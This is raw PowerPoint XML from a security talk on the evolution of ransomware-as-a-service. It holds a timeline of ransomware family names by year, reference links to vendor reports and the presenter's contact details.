    <dgm:cxn modelId="{4D9320EB-B676-466D-A251-9977519991FE}" srcId="{EC518604-BFEA-42C1-BC95-627357BC1FBF}" destId="{AD609BA3-4451-4066-88D5-96FFF2E1CE7C}" srcOrd="0" destOrd="0" parTransId="{7B88D363-B35C-4F93-9A14-DF733FCCEA49}" sibTransId="{AF00C66D-004B-4C47-A409-7142AEF85FDF}"/>
    <dgm:cxn modelId="{F69EEACE-21DF-4AD2-A980-A85DB0DE8A6F}" type="presParOf" srcId="{26FDD54A-E4E3-4B15-94AB-53E21F48CA66}" destId="{BC092206-83D1-4EBA-AFA6-F6930651E85B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{6C852A66-9E36-401C-9D80-99F0E7D020FA}" type="presParOf" srcId="{26FDD54A-E4E3-4B15-94AB-53E21F48CA66}" destId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{7862C42A-80D7-48E2-9B74-278B15D27272}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{B6D52F5F-47F1-44D5-8A72-9FAC62D3FDB9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{F7DC7FD3-D755-4839-AA19-B7004CF5B8EC}" type="presParOf" srcId="{B6D52F5F-47F1-44D5-8A72-9FAC62D3FDB9}" destId="{9023F587-B4D3-4B01-86CA-189CEA678B4B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{08B133A4-91EC-4724-8E8E-58AFA4795D3E}" type="presParOf" srcId="{B6D52F5F-47F1-44D5-8A72-9FAC62D3FDB9}" destId="{1A9D357B-1B9E-40B0-BDB8-8F1F4FA05F7A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{B56D164D-5BCD-4116-B45F-F1B42CA120AD}" type="presParOf" srcId="{B6D52F5F-47F1-44D5-8A72-9FAC62D3FDB9}" destId="{F482BF16-B5CF-466A-BA58-45E6C5357119}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{62EF513A-BFC5-4893-8080-2AAB5E88C56F}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{8675D657-FD81-40F2-A5AC-7DB7535AABD7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{56178F4B-FFAB-4A50-AF28-450F515CE420}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{60DE197F-F80E-478E-BE3F-A7B7EA1CE16A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{A2FF8A02-2698-4E6D-B477-EFDED0A209B4}" type="presParOf" srcId="{60DE197F-F80E-478E-BE3F-A7B7EA1CE16A}" destId="{A229125E-F6E2-4918-A6B2-5ADA54526899}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{8DE57452-38A9-48D1-85B7-6A316A5DBFF6}" type="presParOf" srcId="{60DE197F-F80E-478E-BE3F-A7B7EA1CE16A}" destId="{F9E4FCA1-8B2D-4A79-8E4F-70A79EB6B749}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{5DD8E6B6-26F0-4C8B-A0E6-0F1D0F7902B4}" type="presParOf" srcId="{60DE197F-F80E-478E-BE3F-A7B7EA1CE16A}" destId="{AA870473-4B63-418F-9D1A-30150167CDAE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{4AD4A3E1-94A9-45F1-94AC-B344181892F9}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{6E34B34B-E52E-48ED-ABB6-DCE8C8AA0C03}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{B7ED06C6-F7A6-48AA-A911-EF58DCE68058}" type="presParOf" srcId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" destId="{B95EEF1D-0D23-47F6-BE21-F08259AE9C53}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{BC2BA82D-C3BB-4932-A1F3-1737EFCE7A7B}" type="presParOf" srcId="{B95EEF1D-0D23-47F6-BE21-F08259AE9C53}" destId="{A6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{CD9EFAFE-BE08-401C-BEB9-52A50D85895B}" type="presParOf" srcId="{B95EEF1D-0D23-47F6-BE21-F08259AE9C53}" destId="{D5CC960B-CC1A-4620-AFC1-7A165DA2C273}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11"/>
    <dgm:cxn modelId="{CA6C6C65-654D-4F94-9609-5845F428283D}" type="presParOf" srcId="{B95EEF1D-0D23-47F6-BE21-F08259AE9C53}" destId="{B92E18BA-1B3A-4B01-A46E-B08598A57AFB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092206-83D1-4EBA-AFA6-F6930651E85B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1422496"/>
          <a:ext cx="10717695" cy="1896662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EFDF58F-43EF-4D20-BDFF-FA2766681C25}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2649" y="0"/>
          <a:ext cx="1542500" cy="189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1989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AIDS Trojan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Healthcare industry</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2649" y="0"/>
        <a:ext cx="1542500" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0704A34E-15E8-4B4E-9EDA-157D4A4B1C3C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="536816" y="2133745"/>
          <a:ext cx="474165" cy="47416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EA3F194-836B-46FA-966F-FB3DBB9209FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1622274" y="2844993"/>
          <a:ext cx="1542500" cy="189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/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2012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Reveton</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="500" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1622274" y="2844993"/>
        <a:ext cx="1542500" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{702F9093-90FB-4670-97EA-608CEA8A50CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2156442" y="2133745"/>
          <a:ext cx="474165" cy="474165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AFA2ECC-7081-414F-8FE9-D911E7CB5EBB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3241900" y="0"/>
          <a:ext cx="1542500" cy="189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/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2015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May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Tox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July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Encryptor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> RaaS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August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ORX Locker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Hidden Tear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September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Chimera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November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Crypto-locker by FAKBEN</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3241900" y="0"/>
        <a:ext cx="1542500" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE0D2536-38E4-4692-9538-0A0CA3109358}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3776067" y="2133745"/>
          <a:ext cx="474165" cy="474165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464A6C5-1D76-43AA-BF38-BEF1414786CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4861525" y="2844993"/>
          <a:ext cx="1542500" cy="189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/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2016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January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Ransom32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Petya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March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Alpha-locker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May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Petya and Mischa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June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Golden-Eye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July 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Stampado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August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Shark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November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PadCrypt</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> 3.0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December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Cerber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EDA2 </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4861525" y="2844993"/>
        <a:ext cx="1542500" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BDB0D409-C522-46E4-879E-3CCDF416C45C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5395693" y="2133745"/>
          <a:ext cx="474165" cy="474165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21AD513-822E-41DD-847C-9FBCF49C9F44}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6481151" y="0"/>
          <a:ext cx="1542500" cy="189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/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2017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January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Satan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Hotsman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Flux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February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Philadelphia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Ranion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Spora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Unlock26 Trojan</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="3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DOT ransomware portal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March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Karmen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FileFrozr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May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Zelta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171450" lvl="3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Stampado</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> variant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FatBoy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> RaaS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June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R" sz="500" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>MACRANSOM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R" sz="500" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>SHIFR 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July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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>RaasBerry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August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3301</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="3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Karmen Variant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September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Paradise</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6481151" y="0"/>
        <a:ext cx="1542500" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F25F5B72-A6D4-4903-B95E-4E96B87BFAAE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7015318" y="2133745"/>
          <a:ext cx="474165" cy="474165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33886AF-511F-4677-874B-6FD9310FF6A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8100776" y="2844993"/>
          <a:ext cx="1542500" cy="189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/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2018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January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 err="1"/>
            <a:t>GandCrab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kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>February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R" sz="500" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>ShurL0ckr </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="500" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs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Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Saturn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Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Data Keeper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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>RedFox</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="500" b="0" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs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Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>March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Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Earth</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8100776" y="2844993"/>
        <a:ext cx="1542500" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{84BEFD2A-6ECE-4A2A-81F0-EEE91C5025BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8634944" y="2133745"/>
          <a:ext cx="474165" cy="47416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092206-83D1-4EBA-AFA6-F6930651E85B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1422496"/>
          <a:ext cx="10717695" cy="1896662"/>
        </a:xfrm>
        <a:prstGeom prst="notched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23F587-B4D3-4B01-86CA-189CEA678B4B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4709" y="0"/>
          <a:ext cx="3108550" cy="1896662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1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libri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2016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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>July</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> 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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Stampado</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>December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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Cerber</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4709" y="0"/>
        <a:ext cx="3108550" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1A9D357B-1B9E-40B0-BDB8-8F1F4FA05F7A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1321902" y="2133745"/>
          <a:ext cx="474165" cy="47416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29125E-F6E2-4918-A6B2-5ADA54526899}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3268687" y="2844993"/>
          <a:ext cx="3108550" cy="1896662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1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libri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2017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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>February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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Philadelphia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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Spora</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Ranion</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>May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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Zelta</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="342900" lvl="3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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Stampado</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> variant</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3268687" y="2844993"/>
        <a:ext cx="3108550" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F9E4FCA1-8B2D-4A79-8E4F-70A79EB6B749}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4585880" y="2133745"/>
          <a:ext cx="474165" cy="474165"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/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6BC27F3-2A89-4455-ABAE-E6DB3A061BF4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6532665" y="0"/>
          <a:ext cx="3108550" cy="1896662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1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Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2018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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>January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 err="1"/>
            <a:t>GandCrab</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>February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latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Philadelphia cheap version $20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R" sz="1200" b="0" i="0" kern="1200" dirty="0"/>
            <a:t>ShurL0ckr </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Saturn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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Data Keeper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 err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>RedFox</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs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u="sng" kern="1200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>March</a:t>
          </a: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dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Earth</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6532665" y="0"/>
        <a:ext cx="3108550" cy="1896662"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D5CC960B-CC1A-4620-AFC1-7A165DA2C273}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7849858" y="2133745"/>
          <a:ext cx="474165" cy="474165"/>
        </a:xfrm>
        <a:prstGeom prst="ellips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8749D-2FF6-4897-80DD-F7C282D3F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562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gi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EB0E4E-D845-4A1E-BA74-88B69623E15A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0860E-E5BD-4EA8-81EA-6C8C7C525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72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23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Missing link</a:t>
            </a:r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98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7983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notes https://twitter.com/MusNeoo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>https://sigmateam.neocities.org/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334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66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 5</a:t>
            </a:r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507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572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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>https://www.checkpoint.com/downloads/resources/cerber-report.pdf</a:t>
            </a:r>
          </a:p>
          <a:p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04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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>. https://id-ransomware.blogspot.com/2018/01/gandcrab-ransomware.html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428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687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763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*MALICIOUS LINK FROM CLOUD SERVICES</a:t>
            </a:r>
          </a:p>
          <a:p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5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0860E-E5BD-4EA8-81EA-6C8C7C5254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753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97353" y="923732"/>
            <a:ext cx="7455161" cy="2948472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="60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62669" y="4122633"/>
            <a:ext cx="7389846" cy="561636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="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Presenters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3764259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002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6211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002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6209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95935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95935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501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35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358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1490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6797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33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2787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4" r:id="rId2"/>
    <p:sldLayoutId id="2147483650" r:id="rId3"/>
    <p:sldLayoutId id="2147483652" r:id="rId4"/>
    <p:sldLayoutId id="2147483653" r:id="rId5"/>
    <p:sldLayoutId id="214748365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siriusAnalyst" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Siriusmalware@protonmail.com" TargetMode="Externa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Siriusmalware@protonmail.com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trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolution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onenote://C:/Users/Sue/Documents/OneNote%20Notebooks/Information%20Security/FIRST%20CON.one#Latch&amp;section-id={A326FAB8-7DA7-4F3A-B9C3-D36946F52CF2}&amp;page-id={F9FEF830-D23E-428D-8DD7-E3AE1994FF2B}&amp;object-id={183C7F95-2E1E-49E5-82A8-EEE150DC3DC4}&amp;2A" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/i/web/status/964130871036047360" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.checkpoint.com/downloads/resources/cerber-report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E381065-1C17-4B25-9FE8-B4A40080C9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410" y="3824957"/>
            <a:ext cx="1341739" cy="14532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Ransomware as a Service Evolution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0267" y="4084532"/>
            <a:ext cx="7629331" cy="2387388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Information Security Analyst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Twitter: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Sirius_malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Siriusmalware@protonmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/siriusAnalyst</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Note: Dislike cyber and NEXT gen terms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4CA7C-5794-47CB-809C-479F0E5C6CDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
